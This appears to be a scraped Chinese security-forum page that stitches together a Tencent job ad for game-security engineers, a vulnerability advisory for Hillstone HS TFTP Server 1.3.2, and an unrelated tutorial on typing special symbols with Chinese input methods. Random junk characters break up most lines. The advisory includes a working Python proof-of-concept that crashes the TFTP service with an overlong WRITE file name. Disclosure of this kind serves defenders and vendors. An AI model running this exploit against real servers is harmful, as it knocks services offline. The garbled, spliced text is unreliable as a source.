最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 腾讯招聘业务安全工程师

  • 招聘职位: 网络安全测试工程师
  • 公司名称: 腾讯计算机系统有限公司
  • 工作地点: 广东
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 1年以上
  • 职位薪金: 8000以上
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.qq.com
  • 简历邮箱: 32402324@qq.com
  • 联系电话: 0755-86013388
  • 在线QQ: 32402324
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++腾讯计算机系统有限公司相关说明++++++++++

    业务安全工程师- _6 P" G- ?, @; T( p
    工作地点:深圳
    3 ~& |1 ]4 A3 _4 I6 a招聘人数:15( W! N" W# e! M+ X- p! d  d
    职位描述:
    + w4 x! E9 j1 {9 J负责网络游戏安全技术评测;1 ?6 u- e; R2 w. g7 {) G9 i
    负责网络游戏木&马、**等安全问题技术分析; ( O, F* Y, r% u7 }, N) S' V
    负责网络游戏安全保护方案开发和维护。 # O' g% f$ O9 ]) ]; }

    / i, \* Y0 X# x* K! {6 o职位要求:
    , o4 M# A3 b" U" l% ^+ c熟悉windows系统原理; : \+ X+ S8 L% k% W7 j
    熟悉C/C++语言,有超过一年使用开发经验;
    2 p$ `. F- x( x6 v6 h' p熟悉汇编语言,能够熟练阅读和理解反汇编代码;' q& z* j# j# j
    熟悉OD/WINDBG/IDA等反编译或调试工具; 4 {& X+ h( J' X+ x+ w$ P
    对网络游戏和Windows底层研究有浓厚兴趣;
    * P( n. |/ n  B! d熟悉DDK和Windows内核开发者优先;   \! N) U3 |  S# c& W8 H8 k/ r% w" ?
    熟悉flash开发,javascript开发优先;& ~# R- t7 ~: R1 O
    有Windows木&马、病毒或游戏**相关研究者优先。
    . A0 [) E/ C5 ?6 `8 Z+ F) H4 F) B3 I
    业务安全研究员
    * C# M  [  _  m+ t' _# g! K6 }; _工作地点:深圳 % D. i' R" x- V
    招聘人数:5
    & \( G' ]) b% c4 a( c. D职位描述: ; R; [) y- f& i
    负责网络游戏安全技术预研和技术评测;( S- Z" Q4 U& d. h! i" E: z  s( Q7 S
    负责网络游戏木&马、**等安全问题技术分析;
    7 y( X3 m3 S4 a, T负责网络游戏安全保护方案开发和维护。3 T' ]" R% G1 `( ^# i. E
      F+ P1 \0 M% {* K( a! U
    职位要求:
    . v; {3 X5 V1 X$ h! k& S7 h热爱网络游戏,了解国内网游安全的现状,在网游安全技术方向上有全面或独到的见解;: p9 I9 T0 J. o& h
    熟悉Windows系统原理,使用C/C++超过3年的开发经验,能够熟练阅读反汇编代码;
    , V* I; e' B! M" n9 G熟练掌握IDA/Windbg/OD等调试逆向工具,有实际逆向调试分析经验,了解目前主要的保护壳的原理;! C+ N! D$ D6 [; w% c. [
    在Windows系统内核和驱动方向有超过2年的开发和研究经历,并对此方向有浓厚兴趣;
    ( p" Z9 v, m: P0 f在虚拟机方向有超过1年的研究或开发经历,了解目前主要虚拟机保护工具的原理,并对此方向有浓厚兴趣;
    . z3 d% T  P, |& [) B" J0 n在反病毒、反木&马或反**领域有超过2年开发和研究经历,并对此方向有浓厚兴趣。
    $ t9 `+ k' U, F/ U5 ]) `2 }0 @' Z. B! `, J
    学历:本科以上,特殊人才可以适当放宽。  A' U9 f- O' _7 s5 j1 l
    年薪15万起,优秀者薪酬可面议。
    ( j4 X/ A9 i: ?* a
    详细内容请参看:http://hr.tencent.com/people.php
    / y$ U! |" p: a/ W* r' w
    ) Y$ G  b: `) I9 J. c- V有意者请发送简历至邮箱:32402324@qq.com

     

    您可能还想看的主题:

    windows SDK 系列课程全套

    简单web服务器文件管理5.3缓冲区溢出

    记一次曲折的渗透和另类的提权

    安全宝招聘安全服务工程师

    PHP 5.4 (5.4.3) Code Execution (Win32)

    Android系统再现木马,变身驱动程式袭击用户

    马化腾:Android时代将存在安全危机

    研究人员发现新型“无文件”恶意软件

    windows server 2008做NTP服务器

    Ghost安装器(ISO还原/备份系统/安装系统/进入DOS) 绿色版v1.3.9.2

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:webmaster发表,本帖发表者webmaster符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者webmaster和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    TFTP服务器拒绝服务漏洞
    影响版本: Hillstone Software HS TFTP 1.3.20 Y, R% v0 {% `, i5 K
    发布日期: 02/12/2011
    6 ]! M: O! A2 [% c0 V1 }##############################################3 s4 q$ e- \1 x2 r5 P; i) }

    # i+ C6 L3 n0 hSecPod ID: 1031                 
    - p/ \6 p& h* r5 ~7 L& e21/09/2011 Issue Discovered! S- P0 A7 ~  T8 d5 r$ P# n6 R5 Y
                            1 F5 Z  w$ Z  P, U9 G# ?- W1 B
    04/10/2011 Vendor Notified
    / K: N+ l2 D$ o- ^) o7 C, I                        
    . K% m8 C7 ~# u3 X" P7 ENo Response from Vendor) N  @! u6 S) A! E
                            7 g$ z  A1 E: _5 L
    02/12/2011 Advisory Released

    & U: d4 R* f9 H: F( u# O0 f& p
    Overview:
    8 x6 |0 q9 ~' L" h1 W. I4 i2 p8 Y---------
    0 C$ G! b  C6 H5 X+ _Hillstone Software HS TFTP Server version 1.3.2 is prone to a denial of
    7 l6 y0 z' b  T% Aservice vulnerability.! l. q# d2 g. w  }4 Q: M

    - S8 G$ Z+ m) l- T" \! G! V! u* o: h
    : S4 }& G- R4 q; ]Technical Description:
    $ n6 [4 r( X0 i4 f. p9 `( N----------------------+ {! c  l: Q1 F2 Y  c
    The vulnerability is caused due to improper validation of WRITE/READ Request
    & n: |2 a4 W) n5 _6 n) |Parameter containing long file name, which allows remote attackers to crash
    ! u1 U/ f. s) t  j$ bthe service.
    0 X* J5 e6 `. ~
    3 E$ ?+ S* y( g$ R: {8 _ % _1 m/ C6 K# [: n* v" a
    Impact:
    4 c8 |' e: e+ _% V: P--------$ Y5 X3 Y4 X! c- y
    Successful exploitation could allow an attacker to cause denial of service% M8 w" U0 O" z
    condition.* R. T# F( M0 }) K8 ^# P
    / @$ v9 M4 _9 H2 P; K, f
    4 w5 y6 e- y6 n
    影响版本:
    ) v5 Z$ C. H  T------------------
    * O7 i8 J& J; t+ c% hHillstone Software HS TFTP 1.3.2
    3 O2 D- [4 t# g1 [/ D, d
    2 K4 v4 P9 K$ z  a2 P6 `" T, b' N   S$ A1 b. x6 x
    测试环境:
    * Q' m$ Q& j  i5 [5 T-----------
    ' \. L  G: W8 JHillstone Software HS TFTP 1.3.2 on Windows XP SP3 & Win 7.
    8 A/ ^; p* ?7 Z/ x" DOlder versions might be affected.
    . Y: U, q: ]5 S& A/ r: ^$ b 2 H  O6 k+ P0 B
    # d1 c& ~9 W. y! O$ x+ z
    相关阅读:
    ' U* j" T- T5 i7 i$ _8 K-----------
    / B( U) k7 y. p7 y' h+ L4 H, Zhttp://secpod.org/blog/?p=419
    ' c: `. ^* j9 n+ Z# x; ~http://www.hillstone-software.com/index.htm1 Q% c$ r8 v9 N! H( J* j
    http://www.hillstone-software.com/hs_tftp_details.htm  f6 N; w) w: |8 I: F2 S+ H; F
    http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt" d: S6 E5 ^/ a( D# k- L
    http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py
    - ~6 V! v8 q4 ~& M. B6 Y+ M
    8 k/ S1 U& f8 `
    6 Q8 K' N; J* ?7 W; R" ]Proof of Concept:0 s6 H( a* t3 ^
    ----------------
    * {: @2 r; A0 J5 y( vhttp://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py8 x1 F3 o8 h5 P

    + j; s: S# v0 E) w8 o: h, \+ H
    8 y, i8 o6 b& E$ o9 y8 _6 wSolution:- A3 w5 L& J% J, z9 C
    ----------5 q2 {0 z9 Q& q2 g
    Not available: t" _5 R& L, @8 {2 z, L" V

    7 R5 {+ [  v) N5 ^4 c
    : N  W, `2 x! ]1 ]9 Z$ }& ^* m, ?Risk Factor:
    9 `0 I' _* t" C* `( C& X-------------) b9 j; N( t4 y# P/ r3 ]& I
        CVSS Score Report:
    + t4 g' Y) Y8 |3 \# N# \# ?/ \        ACCESS_VECTOR          = NETWORK/ F& _7 R/ P( s
            ACCESS_COMPLEXITY      = LOW
    1 M( i/ }: n, @% I# V# a6 L7 i        AUTHENTICATION         = NOT_REQUIRED/ ^, f0 D' y+ R* v; q
            CONFIDENTIALITY_IMPACT = NONE
    2 a* Z/ ?0 ?- b  ?( v; `2 J* K6 s        INTEGRITY_IMPACT       = NONE
    + m+ g0 e& j: R4 ^' }% R4 `' p        AVAILABILITY_IMPACT    = PARTIAL
    3 T1 N3 D+ s7 \  K6 ]! e        EXPLOITABILITY         = PROOF_OF_CONCEPT
    2 u! e; f, t$ \% K4 N# y        REMEDIATION_LEVEL      = UNAVAILABLE! q4 A$ j' r" J
            REPORT_CONFIDENCE      = CONFIRMED
    * {' H5 P/ V5 L; [9 @, z        CVSS Base Score        = 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)0 j- @9 J3 f9 R
            Risk factor            = Medium, {, F4 O3 [" V7 u( y, w! Q
    # p; Z, r! ?3 m) G$ X/ ]  |
    " f6 X+ I5 o8 f$ Z1 h
    POC :8 c# M7 h) B9 K) @7 b# X
    ======
    ) h9 p! H  N/ }* ~; T+ l - E. H$ A/ R, J: G7 Q
    import socket,sys,time  {5 S" r% q3 N1 X
    5 O) e5 F7 M: Q7 m
    port   = 69! U1 }2 [5 W; E1 x! d/ K) T
    target = raw_input("Enter host/target ip address: ")
    + x* M- F% W9 @( K" \1 P
    & N6 \# Y' o7 R, n5 qif not target:9 V9 X  N+ C( ]7 ]6 S, I3 O& f
        print "Host/Target IP Address is not specified"& j: s) P& x2 F* x+ z3 i7 p
        sys.exit(1)
      V7 d; y4 l& C% \ 1 X5 I0 H' c0 F8 k0 S
    print "you entered ", target
    $ t: f+ R1 r# A$ L ) Y" m/ z3 B" b% c, |/ E
    try:$ E! r- o/ `* A1 x1 E* |2 y) I0 P0 Q
        socket.inet_aton(target)# G+ V1 D$ q9 l, f! ~9 [
    except socket.error:
    1 v( ^$ |1 ^/ F: u2 c! p% c    print "Invalid IP address found ..."
    8 X0 X5 k/ b7 [  ?    sys.exit(1)
    3 O: ^: o: o- o, N7 d, H1 u2 [. u ) J6 D- R$ Y- i/ q
    try:
    ) P& w& ]8 u) I2 G' r/ m( J7 n* y    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
      g+ G' O( N+ ^8 e3 R) p& E$ Oexcept:; G: b  B' H' `. A! r, E
        print "socket() failed"
    ' z8 i- `3 C' A% z    sys.exit(1)& P$ K, p/ O! R( e( W' u

    4 M8 K! f  Y' x% K## File name >= 222 length leads to crash
    1 p! o' e2 H# [. Nexploit = "x90" * 2222
    4 v% t$ w. ~* @5 e " U) c# }3 e  A7 i3 R1 J" `
    mode = "binary"
    ; T1 W2 h5 V3 p- |6 a- Rprint "File name WRITE/READ crash"/ `" K& u  U  Q
    2 K( B% k# J1 W+ p
    ## WRITE command = x00x02
    : }  r5 {9 f4 o7 v% U! jdata = "x00x02" + exploit + "" + mode + ""
    , Q. o+ Q: C0 }6 x. S# ?! M + t% w' S3 j# x
    ## READ command = x00x01" c. ?; r8 k" z; W0 a3 Z8 G0 n
    ## data = "x00x01" + exploit + "" + mode + ""
    3 B  [% u1 f0 y
    - r4 w- q7 L4 Y0 x  Z  H" \9 jsock.sendto(data, (target, port))
    : y5 I+ H- \" T4 W4 [4 t3 D1 B8 htime.sleep(2)
    + B- h/ c/ z* b8 R2 Ksock.close()8 q  O* `1 v9 x) K% H  T* E1 o! R
    try:7 N: _" J$ V* Y( v) j. f, e0 Q
        sock.connect()
    : r2 [8 o- V5 J- m* [except:  V* \6 S1 H+ k- O4 f
        print "Remote TFTP server port is down..."
    2 x) o5 {+ I+ p# a$ L* w, {    sys.exit(1)

    ( N: h: Q, G3 M

    ( e- {9 T4 S1 G& H; ?7 z* v& b; `9 n, ~. y, E3 e2 M8 j

    2 ?% T* |& W0 k7 p
    & T7 ]* x4 h; }8 R4 x9 D: S: |) Z5 {( I( c5 L/ N* T- s$ t
    9 R5 v3 E) v, Y  |7 ?

    # g; b4 p4 F5 [, a
    0 x- d- n0 a6 `6 w2 f% E/ o: U( Q1 p2 W% P6 B' u$ {3 B4 ^, Z% y

    5 K  [! C/ t4 W+ f7 p) S  L2 N
    . T9 a6 R& g+ d9 X1 [  R
    ; R! r, Y; e* G$ z
    ) X5 C5 O- {; l1 C, j" R. r$ M
    ' s' a* S8 _  a1 T! h2 m
    ( I5 A8 v0 Z" x
    1 r* L" l6 M4 E  h; A7 c- ?6 J" D. H& N
    # R7 o; T: N' o4 b) ]( Z; Y
    " m& l  P: ?& a6 l3 [& v& M, G( X" t4 R
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    九种常用输入法特殊符号功能揭密
    平时经常要输入一些像“★”、“√”之类的特殊符号,或是“壹万贰仟叁佰肆拾伍元”之类的大写金额,很多朋友不知道该如何通过常用输入法快速输入,另外在使用输入法过程中,也时常会出现用五笔输入时有些字不会拆分,用拼音输入时有些字不会读音的情况,这时又该如何来快速输入这些疑难字呢?我们把大家常用的输入法汇集在一起,介绍一下如何解决这些常见的特殊输入问题。同时对于大家选择适合自己的输入法也是一个很好的参考。

    7 I9 `$ V3 |$ i: R( ]5 d9 E7 }/ @
    小提示

    0 T: I3 b0 U  K0 \0 L0 a  T; }
    很多朋友在使用输入法时,会发现一些文字明明拆分或拼音都输入正确了,但就是打不出需要的字,这时你需要检查一下输入法的设置,确认已经打开“GBK”编码,通常为了减少重码,输入法默认使用的是GB2312编码,这种情况下只能输入6763个常用汉字。
    * r8 y0 X1 \5 `3 m" E" l6 Z
    <P align=center>五 笔 输 入 法 [/quote]
    3 i0 G8 P# q7 C3 k0 ~* f/ f
    一、极点中文
    : }/ D$ I& Q1 E- ]) L: u, ]6 `+ j
    1.输入特殊符号
    7 I- @6 S3 Y' _; e- e& \! `
    首先可以按下Shift+Esc组合键快速调出软键盘,按住Shift键后按动Esc键,就会在多个软键盘之间切换,按Esc键即可关闭软键盘。

    5 X, ]5 f+ P# W! u
    极点中文把特殊符号分为22种类型,并进行了特殊编码,其编码定义的基本规则是两个字母“Z”加上代表特殊符号类型的两个声母,常用的特殊符号编码有(全部编码可查阅帮助文档):

    $ |8 f, x% z  c8 t& e# A8 x
    zzbd 标点符号 zzpy 拼音符号 zzts 特殊符号
    & s1 e! @6 Z" r, p
    zzsx 数学符号 zzdw 单位符号 zzjt或zzj 箭头符号
    , ~+ k2 w! {, k! u2 Y" k( r
    zzys或zzy 圆圈数字 zzpp 偏旁

    + P) d+ _6 r( l' N$ U% {. O' l* P6 _
    例如要输入“★”符号,则可以键入“zzts”,然后根据提示条中的显示按“6”即可使符号上屏

    ! C- ]! @8 c6 \! d! E3 S<P align=center>[/quote]
    % X' \' _' g+ c7 {1 }+ X2 I
    小提示
    ' |* \% e  ~$ I+ K
    我们可以在极点中文提示条上右击,选择菜单“管理工具→用户码表”来对默认的特殊符号编码进行修改,同时也可以自行添加新的编码。
    0 b' i$ A+ G% V4 M, V8 X
    2.输入中文日期
    # j9 i! l% Q  y- G
    在极点中文中输入中文日期是非常方便的,其编码格式为分号“;”加上“XXXXnXXyXXr”,其中的X分别代表要输入的年月日数字。例如要输入“二○○五年四月一日”,则键入编码“;2005n4y1r”,这时在提示条中会显示出数字日期和中文日期两种格式,按下数字“2”即可输入中文日期了
    - [7 g0 |: F$ c8 G9 T, p. [" x
    [/quote]$ H7 E% Y- g, u+ [
    <P align=center>

    7 |9 ?- f# B* G+ T/ M& b' x
    小提示

    & U, h, P, S& `5 u% ]
    要使用该功能,需要在极点中文的基本设置中选择“快捷英文热键”为“分号(;)”才行,不过这样设置后,输入中文分号“;”就需要按两下“;”键了。
    6 c3 a6 M# R- b* G
    如果想快速输入当前日期,那就更方便了,键入编码“znyr”可以输入当前年月日,键入编码“year”可以输入当前年份,键入编码“date”可以输入当前日期,键入编码“time”可以输入当前时间,键入编码“now”则可以输入当前精确时间,键入编码“week”可以输入当前星期几。
    2 N. x8 J' ^. r1 }
    3.输入大写数字和金额
    , e# a- u! H) i. [' b' ~
    极点中文的大写数字编码规格是分号“;”加上数字序列,例如当键入“;12345”时,提示条中会显示三种大写数字格式(见图3),选择需要使用的格式即可,按“回车”键选择第一项,按右Shift键或“Shift+回车 ”键选择第二项,按左Shift键选择第三项。如果要输入带元、角、分形式的大写金额,则可以在输入数字后再按一下分号“;”上屏即可。例如键入编码“;12345.67;”,就可以输入“壹万贰仟叁佰肆拾伍元陆角柒分”。

    " D# E% j' u, u
    4.难拆字辅助输入

    . {( P8 w" W. I, R  u
    在极点中文提示条上单击右键,选中“输入法状态”中的“五笔拼音”选项,这样以后当遇到不会用五笔拆分的文字时就可以直接用拼音进行输入,而且不用切换输入法状态,最值得称赞的是,这时极点中文还会在文字后面提示出正确的五笔编码,非常方便。

    9 \( H  b/ N" l! w4 D* i% {( B. Q2 s) J# Q
    [/quote]
    $ J# j7 U! ~1 u! I[quote]二、万能五笔

    ' N% O1 P: X3 D& l7 k% S# P4 l
    1.菜单选择
      C1 `) Q4 B3 R! T; h! Z7 M" Y
    在万能五笔提示条右键菜单中选择“输入特殊符号”,可以看到特殊符号类型列表(见图4),选择要输入的特殊符号类型后,在万能五笔提示条中就会显示出该类型中的特殊符号列表,用数字键选择要输入的符号即可,用“[”和“]”键可以前后翻页查找类别中的其他特殊符号。

    % i# {; s2 e" @5 I<P align=center>[/quote]: T- d( i, ?5 r+ a2 L; y6 ^
    小提示

    * g$ G/ z# K5 M/ ]5 |; F1 s, {
    你还可以直接用快捷键打开某类特殊符号,在菜单中的特殊符号类型后面提示有相应热键,例如要快速输入数字序号,按下Ctrl+2组合键即可。
    ' E! S. @! J( ~' ~% n( Z" q* o
    2.自定义编码输入
    - W7 `, Z: g- b+ k
    万能五笔提供了特殊符号自定义编码功能,利用其自造词功能即可完成,例如想用“tsdh”来输入“√”符号,则可以先利用前面介绍的方法输入“√”,然后选中该符号,在万能五笔提示条中单击“词”按钮,并输入定义的符号编码“tsdh”即可(见图5),这里建议取消“简拼”和“全拼”编码选项,以避免重码。

    ( r$ T0 ~- D! h$ t; H" @
    [/quote]& H/ {; D/ r4 r5 h  }
    <P align=center>
    " F' k. y, [3 _3 o' \
    三、智能五笔

    % p, e0 F  U# q" d3 f; E
    1.特殊符号输入

    3 ^4 d! C8 x+ n0 \( b1 v+ K
    智能五笔首创了分号“;”输入特殊符号的编码方式,使得特殊符号输入不仅方便,而且不会与汉字输入编码重码,具体编码可以查看http://www.znwb.com/help/chhelp414.htm网页中的表4-1。例如想输入“√”符号,只需要键入“;dh”即可看到提示条中的显示,按下空格键即可上屏。

    0 n8 d( P1 O0 H, ]; O
    如果对智能五笔默认的特殊符号编码不太习惯,也可自行修改这些编码,方法是在提示条右键菜单中选择“辅助功能→定义字词符号→自定义符号”项,打开自定义符号管理对话框(见图6),其中每行定义一个符号的编码,根据需要修改左边的符号编码即可,当然,也可以新增符号编码,编码(不包含分号)和符号之间用空格隔开即可,要注意编码为一至二码,不能是三码或四码。
    8 a% O5 r  k8 p8 {+ u5 r8 h, y
    <P align=center>[/quote]* \" E. y# S6 R. b2 f& D# D
    2.疑难字的输入

      j( g1 `& l5 M; L. c/ I
    对于五笔输入法来说,像“凹凸”之类的字是很难记住编码的,虽然智能五笔可以使用右Ctrl键切换到拼音状态进行辅助输入,但毕竟麻烦了一些。为此,智能五笔还提供了一种简便输入这些疑难字的方法,就是连按四下“Z”键,这时在提示条中会显示出疑难字列表(见图7),

    5 M7 j, `& F  N# r) O# s
    [/quote]- {( x' Y9 h5 P1 ?
    <P align=center>
    & @6 Z0 {& p' e) g! q0 B- n4 W
    例如按下数字“2”即可输入“凹”字。

    ; B5 G6 J3 P6 M6 }1 `; b. F
    小提示

    7 K5 R& U! m! \7 }  I
    在智能五笔提示条右键菜单中选择“辅助功能→定义字词符号→疑难字表”项,可以对疑难字表进行自定义,把自己常用的难拆的字用拼音输入进去即可。
    9 x/ s0 s8 b; V) x  J
    3.大写金额输入

    + W+ r- M# k! c; D0 T, H- {3 I; `
    在智能五笔中输入大写金额的编码规则为“分号键+引号键+数字键+小数点+数字键”。例如,当你要输入“壹万贰仟叁佰肆拾伍元陆角柒分”时,可以先按一下分号键,再按一下引号键(分号键右边的键),键入数字“12345.67”,然后按一下空格键即可。

      ~$ v6 c8 \8 g6 B+ ~
    1 @/ f1 k/ O6 J# T: D( w$ S3 |( \  F
    [/quote]: ~$ E# l: b9 o5 F! ^3 t" C
    [quote]四、五笔加加

    ! u3 R. S3 y3 ^4 D% \
    五笔加加默认对一些常用的特殊符号进行了编码,其编码规则是该符号中文名称对应的五笔编码。例如要输入“√”符号,只需要输入其中文名称“对勾”的五笔编码“cfqc”,即可在提示条上看到提示,由于有重码,按下数字“2”即可输入。具体编码与特殊符号对应列表可以打开C:/Program Files/WBJJ目录中的“wbjj_biaod.htm”文件进行查看。

      R& P' @$ S' n6 _/ U5 [( [6 O
    此外,对于一些像“ⅠⅡⅢⅣ”、“①②③④⑤”之类的系列符号,五笔加加则规定了另外的简便输入规则,首先按“Z” 键,进入系列符号输入状态,然后输入系列符号中文名称对应的五笔编码,即可从提示条中进行选择输入。例如要输入“Ⅲ”,就可以先输入“Z”,再输入“大写罗马”的五笔编码“dplc”,然后按数字“3”选择即可(见图8)。系列符号的编码对应关系也可以打开“wbjj_biaod.htm”文件查看。

    7 @( J. u( {6 o  h1 k<P align=center>[/quote]
    4 l) d+ l" m7 s3 h; P" T' s* j7 U
    小提示

    " A/ y/ {; _1 C
    单击五笔加加提示条,选择“管理工具”菜单下的“自定义编码工具”,单击“编辑单个符号表”按钮或“编辑成组符号表”按钮,可对特殊符号及其编码进行增删、修改操作。

    8 F: L" Y( G4 S# B: h<P align=center>拼音输入法 [/quote]8 k% L7 B6 y, C% L& q0 T5 x  P
    一、拼音加加

    # D) N$ _; |' i
    1.特殊符号输入
    . R# j1 e% S$ d: `
    拼音加加在特殊符号输入上和五笔加加具有许多相似之处,同样采用内置编码的方式来输入特殊符号,但其编码规则是特殊符号中文名称的简拼(即拼音首字母),例如要输入符号“√”,直接输入其中文名称“对勾”的拼音编码“dg”,然后根据提示条中的提示按数字“3”即可上屏(见图9)。具体编码与符号的对应列表可以打开C:/Program Files/JJOL/IME目录中的“拼音加加符号列表”文件“pyjj_biaod.HTM”进行查看。

    0 E, C5 i9 y# k3 J5 }<P align=center>[/quote]' T5 q  x) A1 H: P
    <P align=center>[/quote]
    9 G6 _8 S! x* y6 Z
    2.输入中文数字
    % a7 Y# l, X2 i/ x
    直接输入阿拉伯数字,例如“12345”,就可从提示条中看到两种常用的中文数字格式,按下需要使用的格式序号即可。

    9 W8 T7 N. F. F$ e
    3.输入中文日期
    * ~2 N6 J7 U# G! |
    直接输入“98-2-3”或者“98/2/3”格式的数字,拼音加加就会在提示条中显示出两种常用的日期格式(见图10),输入序号即可上屏。

    . J& Y. e1 r, G( F<P align=center>[/quote]' z) k; c4 |6 V
    4.辅助输入
    % S& M1 s! {) F
    当输入文稿时,如果遇到不认识的字,可以按下字母“i”进入临时笔画输入法,然后即可按照该字的笔画书写顺序进行输入,这里的笔画输入法和手机上使用的笔画输入法类似,只不过是键位定义有些区别,拼音加加的五个基本笔画横、竖、撇、点(捺)、折分别用其拼音首字母来表示,即h、s、p、d(n)、z。例如,“殳”字可能大部分人都不知道它的读音,但我们依然可以在拼音加加中正确输入,编码是“ipzzn”,然后根据提示按数字“3”即可,而且文字后面会告诉你该字的拼音(见图11)。

    ) Y  i3 w0 m3 i& L<P align=center>[/quote]
    $ x; M2 I' a: U# j; i) _' o
    二、紫光拼音
    7 j: B5 i/ R) U0 U& {; I
    1.特殊符号输入

    ( S' |" g* g" _  }- D7 j
    在紫光拼音中可以使用软键盘来输入各种特殊符号,它提供有13类软键盘符号,使用时右键单击输入法提示条中的软键盘图标,然后选择符号类型即可打开软键盘(见图12),点击需要输入的符号即可。
    8 \7 X# d1 y( x7 p1 O; I% B# ^* u5 A
    <P align=center>[/quote]) l1 E- v& R) ?! G9 B
    除了使用软键盘输入外,紫光拼音还允许使用特定编码输入一些常用的特殊符号,在提示条上单击鼠标右键,选择“属性设置”,然后打开“自定义→特殊字词和短语”,即可看到特殊符号的编码,当然我们也可以自行输入或修改编码,格式为“英文编码=特殊符号”,例如添加一行“dhao=√”(见图13),然后单击“确定”按钮保存设置,以后就可以用“dhao”来输入“√”了。

    5 f, G; ?& O+ c3 S7 u8 w
    [/quote]
    # |% I. d- Z) t$ a( W* l4 ]& J) T7 I<P align=center>
    ( j8 ~% I( O# u3 S; q3 P
    小提示
    1 P5 i0 n: X. P# f- e6 V3 w: \8 |6 C
    这里定义的特殊符号编码不能立即生效,需要重启紫光拼音输入法后才能生效。

    1 T% {! [# \2 u* \, m8 f) m' x# \
    2.中文数字输入
    ; \/ m& \3 W6 F$ ]5 M' ?: D7 Z
    在紫光拼音中按下字母“i”和“u”可以临时输入中文数字和常用单位,在输入时,紫光拼音要求使用特定的字母来代表数字的单位,具体如下:

    4 {% [2 h  d. T6 b+ U7 D% k
    g 个 s 十/拾 b 百/佰

    1 o; c3 N. O/ M; b& m
    q 千/仟 w 万 z 兆
    9 o. {6 ~. C* O* b' N  U  e
    n 年 y 月 r 日

    4 d3 Q0 d# W0 f$ V1 x* s
    d 点 f 分 m 秒

    ( A- @3 ?3 d. S) j5 F
    v 元 j 角

    * R# L8 T: F2 u- j
    其中按下字母“i”后可以临时切换到中文数字小写形式输入状态(一、二、三等),例如键入“i2005n4y1r”可以输入“二○○五年四月一日”,而按下“u”后可以临时切换到中文数字的大写形式输入状态(壹、贰、叁等),也就是大写货币金额,例如键入“u8w7q6b3s1v”就可以输入“捌万柒仟陆佰叁拾壹元”。
      L% Z" B1 h; k2 Z! q2 z
    三、微软拼音
    " D5 V6 a9 a9 A( }
    微软拼音的特殊符号输入相对比较麻烦一些,只能使用软键盘进行输入,这里同时也提示一下大家,对于系统自带的其他输入法以及一些标准接口输入法,使用软键盘是通用的特殊符号输入方式。
    9 z" Q* q$ b& o; w/ u
    四、智能狂拼

    1 T: a1 p0 ~! p5 `% F
    1.特殊符号输入

    " i9 `( S; B* l' T5 t9 h, c
    智能狂拼可以很方便地输入偏旁部首以及计量单位等特殊符号。其基本输入方法是先按“Ctrl+[” 组合键进入特殊符号输入状态,然后按照下面的特殊符号类型编码进行输入,其编码规则是取其中文名称前两个字的声母。
    7 ?# x  f+ Y/ [% Y" M$ `
    部首=bs 数学符号=sx 数字序号=xh

    3 P& u% l( G9 t4 v1 {
    特殊符号=fh 计量单位=jl 标点符号=bd
    4 r' N1 B/ E) M' |: V- N. l6 m! m
    箭头符号=jt 希腊字母=xl 日文字母=rw
    * b8 l  G, p. e# K2 d
    罗马字母=lm 拼音符号=py 注音符号=zy
    , X- n- O! \5 a
    天干地支=tg 俄文字母=ew
    / f4 i# N' n/ a' `, M# U. k$ d
    [/quote]' Z! V+ C( W2 X, C. _) i
    [quote]例如要输入数学符号中的“√”,就可以按下“Ctrl+[”后,再按“sx”,这时在提示条中会显示出数学符号列表,不过当前显示并没有出现“√”,需要翻页才能出现,这里有个技巧,你只要继续输入特殊符号读音的第一个声母,就可以缩小提示条中显示的符号范围,这里我们再输入“d”,就可以在提示条中看到“√”了。

    & s4 Y, r' B& e9 D, M
    2.疑难字和偏旁部首输入
    6 `" e5 Z5 X! P4 c7 g
    对于不认识或不能正确发音的字,智能狂拼也提供了笔画辅助输入方式,其五个基本笔画对应键位和拼音加加完全一样,输入方式上则需要先按“Ctrl+[” 组合键进入特殊输入状态,然后即可按照该字的笔画书写顺序输入编码,利用这个方法也可以直接输入偏旁部首的笔画顺序,这要比使用前面的“bs”再选择部首的方法准确一些。

    8 }' N9 u& K+ Y/ U) r; r5 D& T- d
    五、龙文输入法
    " k1 Q8 T+ `* H$ S, `
    在特殊符号输入上,它也提供了和标准输入法完全一样的软键盘输入方式,同时还提供了非常方便的自定义编码输入方式,不过默认并未启用这个功能,需要在提示条上右击,选择“系统设置与管理”,然后单击“系统管理”选项卡,选中“批量添加词组或用户自定义词库到用户词库”选项,并在“编码方案”中选择你习惯使用的输入法选项(见图14),单击“浏览”按钮,在打开对话框中选择“自定义编码”文件,最后单击“开始执行”按钮即可。

    # Q! @$ p. n# Y- x+ Y( x, w<P align=center>[/quote]% G. R* x. ]1 b* D) W0 z
    这里的特殊符号编码是龙文输入法默认设置好的,一般是以特殊符号中文名称的声母作为编码的,我们打开“C:/Program Files/龙文输入法平台”目录下的“自定义编码”文件,就能看到这些编码的定义了,当然,如果你想修改这些编码设置,只需要修改这个文本文件即可。
    9 ]8 r1 h" l# z7 r& O" `/ V

    / a! ]9 ~& A+ h4 f0 j5 C+ B- v! ?* R) m9 @1 `
    % C- ?6 u, {' w6 f5 b- n% j

    9 s/ J$ _  x: u0 q4 p' J8 E$ d" @# D4 L2 R  f2 W* j
    * I. M- S. y$ O4 p3 }

    2 y/ G" C; y6 m; y) q5 l) Q  G# q
    1 k9 I0 ?) \5 Q( u9 A& j# W7 C5 K, Y* s" J- A/ Q6 K7 ~
